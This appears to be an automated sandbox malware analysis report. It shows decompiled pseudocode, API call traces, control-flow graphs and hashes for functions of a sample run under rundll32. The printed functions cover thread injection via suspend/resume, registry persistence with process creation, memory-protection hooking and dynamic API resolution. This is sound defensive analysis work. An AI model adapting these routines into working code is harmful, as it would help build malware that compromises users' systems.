                                                          • Instruction ID: cc653f0134aa87c5c895ff05273c938467e4e29e115b715cbebd7a26f4e2b8b5
                                                          • Opcode Fuzzy Hash: f0858161ba6842cf221759b88905f91ce2d15e59b289ad79728eaa76051973d1
                                                          • Instruction Fuzzy Hash: A8415071A1070A9FDB71CFA4CC49EAAB7F5FF48350F048515EA52A62A0E774E819CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D76BB Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 74%
                                                          			E036D76BB(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L036D8244();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x36da348; // 0x228d5a8
				_t5 = _t13 + 0x36db87a; // 0x5968e22
				_t6 = _t13 + 0x36db594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L036D7EAA();
				_t17 = CreateFileMappingW(0xffffffff, 0x36da34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x036d76bb
                                                          0x036d76c3
                                                          0x036d76c7
                                                          0x036d76cd
                                                          0x036d76d2
                                                          0x036d76d7
                                                          0x036d76da
                                                          0x036d76dd
                                                          0x036d76e2
                                                          0x036d76e3
                                                          0x036d76e6
                                                          0x036d76eb
                                                          0x036d76f2
                                                          0x036d76fc
                                                          0x036d76fe
                                                          0x036d76ff
                                                          0x036d7702
                                                          0x036d771e
                                                          0x036d7724
                                                          0x036d7728
                                                          0x036d7776
                                                          0x036d772a
                                                          0x036d7737
                                                          0x036d7747
                                                          0x036d774f
                                                          0x036d7761
                                                          0x036d7765
                                                          0x00000000
                                                          0x00000000
                                                          0x036d7751
                                                          0x036d7754
                                                          0x036d7759
                                                          0x036d775b
                                                          0x036d775b
                                                          0x036d7739
                                                          0x036d773b
                                                          0x036d7767
                                                          0x036d7768
                                                          0x036d7768
                                                          0x036d7737
                                                          0x036d777d

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,036D3DBA,?,?,4D283A53,?,?), ref: 036D76C7
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 036D76DD
                                                          • _snwprintf.NTDLL ref: 036D7702
                                                          • CreateFileMappingW.KERNELBASE(000000FF,036DA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 036D771E
                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,036D3DBA,?,?,4D283A53,?), ref: 036D7730
                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 036D7747
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,036D3DBA,?,?,4D283A53), ref: 036D7768
                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,036D3DBA,?,?,4D283A53,?), ref: 036D7770
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: ad7650581eca982c1a3242cef1f46f19acfc2a820e59152469d65a0c2de42467
                                                          • Instruction ID: 6de7adf7dde140482bb4f0f5c0ecbade3e1f01497a58c5e62aa8f37021121083
                                                          • Opcode Fuzzy Hash: ad7650581eca982c1a3242cef1f46f19acfc2a820e59152469d65a0c2de42467
                                                          • Instruction Fuzzy Hash: 2B21E476E41204BBD711EF68EC09F9E77F9AB88750F250124FA05EB2C8D7B09905CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627C5C4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125threadsynchronizationinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 353 627c5c4-627c609 memset call 628212c 356 627c6f5-627c6fc 353->356 357 627c60f 353->357 358 627c616-627c61e 356->358 359 627c702-627c705 call 628ed07 356->359 357->358 361 627c620-627c637 call 6286de0 358->361 362 627c63d-627c64f 358->362 363 627c70a 359->363 361->362 372 627c73c-627c740 361->372 365 627c651-627c658 call 62714c6 362->365 366 627c65b-627c672 call 6285220 362->366 367 627c73a 363->367 365->366 374 627c734 GetLastError 366->374 375 627c678-627c67c 366->375 367->372 376 627c742 372->376 377 627c74b-627c751 372->377 374->367 378 627c682-627c693 call 6289048 375->378 379 627c72d-627c732 375->379 376->377 378->374 382 627c699 378->382 379->372 383 627c69e-627c6ba WaitForSingleObject 382->383 385 627c6bf-627c6e2 SuspendThread call 62736bb 383->385 386 627c6bc-627c6be 383->386 389 627c6e4-627c6e7 385->389 390 627c6e9-627c6ec 385->390 386->385 389->383 389->390 391 627c6ee-627c6f3 390->391 392 627c70c-627c71a call 6286de0 390->392 393 627c71c-627c72b call 6289048 391->393 392->393 393->372
                                                          APIs
                                                          • memset.NTDLL ref: 0627C5E7
                                                            • Part of subcall function 0628212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0627111D,00000000), ref: 0628214D
                                                            • Part of subcall function 0628212C: GetProcAddress.KERNEL32(00000000,?), ref: 06282166
                                                            • Part of subcall function 0628212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0627111D,00000000), ref: 06282183
                                                            • Part of subcall function 0628212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0627111D,00000000), ref: 06282194
                                                            • Part of subcall function 0628212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0627111D,00000000), ref: 062821A7
                                                          • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 0627C6A1
                                                          • WaitForSingleObject.KERNEL32(00000064), ref: 0627C6AF
                                                          • SuspendThread.KERNEL32(00000004), ref: 0627C6C2
                                                            • Part of subcall function 06286DE0: memset.NTDLL ref: 062870AA
                                                          • ResumeThread.KERNEL32(00000004), ref: 0627C745
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                                                          • String ID: v
                                                          • API String ID: 2397206891-1801730948
                                                          • Opcode ID: c3308e64ddb5488e8d1761eae1d99379f18732012d568b80fd87d057d7bfc10b
                                                          • Instruction ID: a738f564481e8042dcb62bc96dfbdfd9206b90926ab9224c2b3641db0bff8e33
                                                          • Opcode Fuzzy Hash: c3308e64ddb5488e8d1761eae1d99379f18732012d568b80fd87d057d7bfc10b
                                                          • Instruction Fuzzy Hash: 0341CF71A2024AAFDF91AFA4CC88EEE7BB9EF44354F144465EE15AA150CB30DA51CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D4274 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 93%
                                                          			E036D4274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E036D6E40(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E036D6C2C(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E036D6C2C(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E036D6C2C(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E036D6C2C(_t46);
				}
				return _t24;
			}












                                                          0x036d4274
                                                          0x036d4274
                                                          0x036d4276
                                                          0x036d4278
                                                          0x036d427f
                                                          0x036d4286
                                                          0x036d4286
                                                          0x036d428b
                                                          0x036d428e
                                                          0x036d4295
                                                          0x036d429e
                                                          0x036d42a2
                                                          0x036d42a7
                                                          0x036d42a7
                                                          0x036d42a9
                                                          0x036d42ae
                                                          0x036d42b2
                                                          0x036d42b7
                                                          0x036d42b7
                                                          0x036d42b9
                                                          0x036d42be
                                                          0x036d42c2
                                                          0x036d42c7
                                                          0x036d42c7
                                                          0x036d42c9
                                                          0x036d42d4
                                                          0x036d42d7
                                                          0x036d42d7
                                                          0x036d42d9
                                                          0x036d42de
                                                          0x036d42e1
                                                          0x036d42e1
                                                          0x036d42e3
                                                          0x036d42ea
                                                          0x036d42ed
                                                          0x036d42f2
                                                          0x036d42f5
                                                          0x036d42f5
                                                          0x036d42f8
                                                          0x036d42fd
                                                          0x036d4300
                                                          0x036d4300
                                                          0x036d4305
                                                          0x036d4309
                                                          0x036d430c
                                                          0x036d430c
                                                          0x036d4311
                                                          0x036d4316
                                                          0x00000000
                                                          0x036d4319
                                                          0x036d4320

                                                          APIs
                                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 036D42A2
                                                          • InternetCloseHandle.WININET(?), ref: 036D42A7
                                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 036D42B2
                                                          • InternetCloseHandle.WININET(?), ref: 036D42B7
                                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 036D42C2
                                                          • InternetCloseHandle.WININET(?), ref: 036D42C7
                                                          • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,036D3801,?,?,76CC81D0,00000000,00000000), ref: 036D42D7
                                                          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,036D3801,?,?,76CC81D0,00000000,00000000), ref: 036D42E1
                                                            • Part of subcall function 036D6E40: WaitForMultipleObjects.KERNEL32(00000002,036D7BB5,00000000,036D7BB5,?,?,?,036D7BB5,0000EA60), ref: 036D6E5B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                                          • String ID:
                                                          • API String ID: 2172891992-0
                                                          • Opcode ID: f4a800e12133e7b46bb712b693749a05f1143057025166cd2e3610f52d2fe836
                                                          • Instruction ID: a70bb3afe09d2a1aa5cf7a05176e6382c774dcb2abb12cb869adf1adc5b67ccc
                                                          • Opcode Fuzzy Hash: f4a800e12133e7b46bb712b693749a05f1143057025166cd2e3610f52d2fe836
                                                          • Instruction Fuzzy Hash: BD11C97AA007485BC631EEABED84C5BF7EDAF492103991D1DE445D7A10CF35FC448A68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06283959 Relevance: 10.7, APIs: 7, Instructions: 185registrysynchronizationprocessCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 446 6283959-6283991 call 628bad1 449 6283993 446->449 450 62839f5-6283a0a WaitForSingleObject 446->450 451 6283996-62839ab call 628a651 449->451 452 6283a10-6283a1e 450->452 453 6283af4-6283b2d RtlExitUserThread 450->453 469 62839dc-62839f3 call 628e803 451->469 470 62839ad-62839c4 451->470 454 6283ab0-6283ac3 call 6283829 452->454 455 6283a24-6283a45 RegOpenKeyA 452->455 457 6283b2f-6283b3b 453->457 458 6283b40-6283b67 CreateProcessA 453->458 454->453 477 6283ac5-6283ad4 WaitForSingleObject 454->477 459 6283a6f-6283a72 455->459 460 6283a47-6283a69 RegSetValueExA RegCloseKey 455->460 457->458 474 6283b3d 457->474 461 6283b69-6283b6f call 6285d7a 458->461 462 6283b74-6283b76 458->462 466 6283a79-6283aad call 628e778 459->466 467 6283a74-6283a77 459->467 460->459 461->462 471 6283b78-6283b79 call 628e803 462->471 472 6283b7e-6283b8c 462->472 466->454 467->454 467->466 469->450 469->451 470->469 483 62839c6-62839d7 call 627f39b 470->483 471->472 474->458 477->453 481 6283ad6-6283af1 call 628d30a 477->481 481->453 483->469
                                                          APIs
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BB71
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?), ref: 0628BBCC
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BBEF
                                                            • Part of subcall function 0628BAD1: wcscpy.NTDLL ref: 0628BC01
                                                          • WaitForSingleObject.KERNEL32(00000000,?,06899998,?,00000000,00000000,00000001), ref: 06283A03
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 06283A3D
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 06283A60
                                                          • RegCloseKey.ADVAPI32(?), ref: 06283A69
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 06283ACD
                                                          • RtlExitUserThread.NTDLL(?), ref: 06283B03
                                                            • Part of subcall function 0628A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0627148A,?,?,?), ref: 0628A66F
                                                            • Part of subcall function 0628A651: GetFileSize.KERNEL32(00000000,00000000,?,?,0627148A,?,?,?), ref: 0628A67F
                                                            • Part of subcall function 0628A651: CloseHandle.KERNEL32(000000FF,?,?,0627148A,?,?,?), ref: 0628A6E1
                                                          • CreateProcessA.KERNEL32(?,?,?,76CDF750,?,?,?,?,?,?,?,?,76CDF750), ref: 06283B5C
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
                                                            • Part of subcall function 0627F39B: GetLastError.KERNEL32 ref: 0627F3E5
                                                            • Part of subcall function 0627F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
                                                            • Part of subcall function 0627F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
                                                            • Part of subcall function 0627F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
                                                            • Part of subcall function 0627F39B: SetEndOfFile.KERNEL32(00001000), ref: 0627F477
                                                            • Part of subcall function 0627F39B: CloseHandle.KERNEL32(00001000), ref: 0627F48F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                                                          • String ID:
                                                          • API String ID: 3876914104-0
                                                          • Opcode ID: 3c5c6048b572b589e0508f3920307a8236ce6565f5a4391a10c570a36bd580b2
                                                          • Instruction ID: f2fecdbca074e94008d60f4a8c77d22b5dd27d44cb1f3c9a316cbbc2773822a9
                                                          • Opcode Fuzzy Hash: 3c5c6048b572b589e0508f3920307a8236ce6565f5a4391a10c570a36bd580b2
                                                          • Instruction Fuzzy Hash: D0615E71A11309AFDF40EFA9DC89E9AB7B9FB49760F044129FA18E7290D7309951CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06278C35 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 062733A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 062733CA
                                                            • Part of subcall function 062733A5: GetLastError.KERNEL32(?,00000000), ref: 062733D2
                                                            • Part of subcall function 062733A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 062733E9
                                                            • Part of subcall function 062733A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0627340E
                                                          • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,062960B0,0000001C,0628BE61,00000002,?,00000001,80000000,06299A20,80000000), ref: 06278D90
                                                            • Part of subcall function 0627A253: lstrlen.KERNEL32(?,?), ref: 0627A28B
                                                            • Part of subcall function 0627A253: lstrcpy.KERNEL32(00000000,?), ref: 0627A2A2
                                                            • Part of subcall function 0627A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 0627A2AB
                                                            • Part of subcall function 0627A253: GetModuleHandleA.KERNEL32(00000000), ref: 0627A2C9
                                                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 06278D0D
                                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,062960B0,0000001C,0628BE61), ref: 06278D28
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 06278D4D
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 06278D6B
                                                            • Part of subcall function 062733A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 06273417
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 899430048-3916222277
                                                          • Opcode ID: 75d05723f72f0e0c16ed5762066ad3e04e368562a3959d7907f50b6b8d3ff98c
                                                          • Instruction ID: 20cc91f50007435b67709d4faef0c8352c980a69fe1c70971e05daae41008701
                                                          • Opcode Fuzzy Hash: 75d05723f72f0e0c16ed5762066ad3e04e368562a3959d7907f50b6b8d3ff98c
                                                          • Instruction Fuzzy Hash: 4341797091021AAFDB50CF69D848EADBBB4FF48310F10812AED24AB240C778E950CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062855E4 Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 062861AE: GetProcAddress.KERNEL32(?,00000318), ref: 062861D3
                                                            • Part of subcall function 062861AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 062861EF
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0628561D
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 06285708
                                                            • Part of subcall function 062861AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 06286359
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 06285653
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0628565F
                                                          • lstrcmpi.KERNEL32(?,00000000), ref: 0628569C
                                                          • StrChrA.SHLWAPI(?,0000002E), ref: 062856A5
                                                          • lstrcmpi.KERNEL32(?,00000000), ref: 062856B7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                                          • String ID:
                                                          • API String ID: 3901270786-0
                                                          • Opcode ID: 809c514d7356f6d4206414113c3967851e5bcf68caaf1c90c0ec91b23017f9b7
                                                          • Instruction ID: a82f50704bd585bc1f2a1c5b5b737ffd0caa43ed58fbfefbf2b105d4681a4160
                                                          • Opcode Fuzzy Hash: 809c514d7356f6d4206414113c3967851e5bcf68caaf1c90c0ec91b23017f9b7
                                                          • Instruction Fuzzy Hash: 8C316F71916322AFD3A19F11DC44B1BBBE9FF88755F100918FD8476280D774E904CAA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D402A Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E036D402A(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E036D44DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E036D7A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x36da300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x36da348; // 0x228d5a8
					_t18 = _t47 + 0x36db3f3; // 0x73797325
					_t68 = E036D7326(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x36da348; // 0x228d5a8
						_t19 = _t50 + 0x36db73f; // 0x5968ce7
						_t20 = _t50 + 0x36db0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E036D23AA();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E036D23AA();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x36da2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E036D6C2C(_t70);
				goto L12;
			}


















                                                          0x036d4032
                                                          0x036d4032
                                                          0x036d4041
                                                          0x036d4048
                                                          0x036d404d
                                                          0x036d415a
                                                          0x036d4161
                                                          0x036d4161
                                                          0x036d405c
                                                          0x036d4064
                                                          0x036d4067
                                                          0x036d406c
                                                          0x036d4081
                                                          0x036d4087
                                                          0x036d4088
                                                          0x036d408b
                                                          0x036d4091
                                                          0x036d4094
                                                          0x036d4099
                                                          0x036d40a1
                                                          0x036d40ad
                                                          0x036d40b1
                                                          0x036d4141
                                                          0x036d40b7
                                                          0x036d40b7
                                                          0x036d40bc
                                                          0x036d40c3
                                                          0x036d40d7
                                                          0x036d40db
                                                          0x036d412a
                                                          0x036d40dd
                                                          0x036d40de
                                                          0x036d40e5
                                                          0x036d40fe
                                                          0x036d4100
                                                          0x036d4104
                                                          0x036d410b
                                                          0x036d4125
                                                          0x036d410d
                                                          0x036d4116
                                                          0x036d411b
                                                          0x036d411b
                                                          0x036d410b
                                                          0x036d4139
                                                          0x036d4139
                                                          0x036d40b1
                                                          0x036d4148
                                                          0x036d4151
                                                          0x036d4155
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 036D44DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,036D4046,?,?,?,?,00000000,00000000), ref: 036D4503
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 036D4525
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 036D453B
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 036D4551
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 036D4567
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 036D457D
                                                          • memset.NTDLL ref: 036D4094
                                                            • Part of subcall function 036D7326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,036D40AD,73797325), ref: 036D7337
                                                            • Part of subcall function 036D7326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 036D7351
                                                          • GetModuleHandleA.KERNEL32(4E52454B,05968CE7,73797325), ref: 036D40CA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 036D40D1
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D4139
                                                            • Part of subcall function 036D23AA: GetProcAddress.KERNEL32(36776F57,036D7989), ref: 036D23C5
                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 036D4116
                                                          • CloseHandle.KERNEL32(?), ref: 036D411B
                                                          • GetLastError.KERNEL32(00000001), ref: 036D411F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
